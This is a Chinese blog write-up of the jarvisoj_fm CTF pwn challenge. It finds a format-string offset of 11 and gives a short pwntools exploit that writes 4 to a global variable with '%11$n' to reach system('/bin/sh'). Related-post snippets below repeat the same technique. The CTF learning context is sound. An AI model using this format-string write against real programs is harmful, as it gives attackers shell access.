jarvisoj_fm1解题

于 2024-07-10 19:51:01 发布
阅读量115 收藏
点赞数 4
文章标签: c++ python 网络安全 汇编 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81504456/article/details/140332437
版权

1.文件检查,是32位程序,ida编译,按F5得到C语言代码。2.观察代码,初始化buf数组后往其读入数据0x50个数据,buf数组大小是0x5C(十进制下为92),没有溢出。之后有printf函数,打印给x数值,当x==4满足条件条件时直接执行system(/bin/sh)。所以根据存在printf函数,利用格式化字符串漏洞,使得x值为4,就可以getshell。

3.点击printf函数,或再按tap和空格键找到函数调用位置0x80485C4,在gdb上下断点,运行,输入一段数据,得到偏移量为11。

4.32位程序地址本身是4字节,再加上b'%11$n'就可以满足条件构造payload(为平衡栈可以加上些参数)。wp如下:

from pwn import*
io = process('./fm')
#io.recvline()
bin_addr = 0x804a02c
payload = p32(bin_addr) + b'%11$n' +p32(4)

io.sendline(payload)
io.interactive()

承诺之时
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
STM32F103_FM17550.rar
11-12
1. 示例代码:提供STM32与FM17550及RF卡交互的C/C++代码,可能包括配置串口、USB通信、RF卡协议处理等功能。 2. 驱动库:STM32的HAL库或LL库,以及FM17550的驱动代码。 3. 工程文件:如Keil、IAR或STM32CubeIDE等IDE...
fm3_peripheral_library_1_FM3_官方驱动库_fm3fujitus富士通_
10-04
富士通FM3系列微控制器是基于ARM Cortex-M3内核的高性能MCU,广泛应用于工业控制、汽车电子、消费电子等领域。官方提供的FM3 Peripheral Library是为开发者提供的一套全面的驱动程序库,旨在简化FM3系列芯片的外围...
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 216
BUUCTF 做题练习
jarvisoj_fm
小白垃圾笔记2
05-20 742
fmtstr_payload(offset,writes,numbwritten=0,write_size='byte')
jarvisoj_fm【BUUCTF】
qq_41696518的博客
08-31 290
jarvisoj_fm【BUUCTF】
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 207
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 209
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
FM.zip_FM_FM matlab
09-23
标题中的"FM.zip_FM_FM matlab"表明这是一个与调频(FM)技术相关的MATLAB项目压缩包。MATLAB是一种广泛用于数值计算、符号计算、数据可视化和建模的高级编程环境,尤其在信号处理和通信领域中应用广泛。在这个项目...
FM.rar_FM_fm matlab_modulation
09-21
标题中的"FM.rar_FM_fm matlab_modulation"表明这是一个与调频(FM)技术相关的MATLAB代码压缩包。MATLAB是一种强大的编程环境,常用于数值计算、数据分析以及信号处理等领域,包括模拟和分析调频系统。 描述中的...
FM.zip_FM_FM matlab_FM调制解调_fm解调_fm调制
09-21
在本文中,我们将深入探讨由标题“FM.zip_FM_FM matlab_FM调制解调_fm解调_fm调制”所涵盖的FM(频率调制)技术,以及如何使用MATLAB进行FM调制与解调的仿真。MATLAB是一款强大的数学计算软件,广泛应用于信号处理和...
JarvisOJ fm
PLpa的博客
07-09 1059
这一题是一道格式化字符串漏洞题 关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862 拿到这一题,我们仍然是先查看保护: 我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。 接下来我们就可以进入IDA中看一下程序的具体逻辑: 在这里,我们可以看到有一个明显的...
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 322
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
【CTF】jarvisoj_fm 1
凉水的博客
07-06 526
jarvisoj_fm
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 698
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 385
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 253
有canary ,题目提升fm,考虑格式化字符串。
BUUCTF 刷题 jarvisoj_fm
Helloity的博客
02-13 364
题目:BUUCTF在线评测 checksec一下,32位程序,有canary,开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下,发现一个明显的printf格式化字符串漏洞,我们需要控制x的值为4,就可以获得binsh int __cd
login_window_fm
最新发布
07-13
您提到的 "login_window_fm" 可能是指登录窗口的相关代码。以下是一个简单的使用Python和Tkinter库创建登录窗口的示例: ```python from tkinter import * def login(): username = entry_username.get() ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值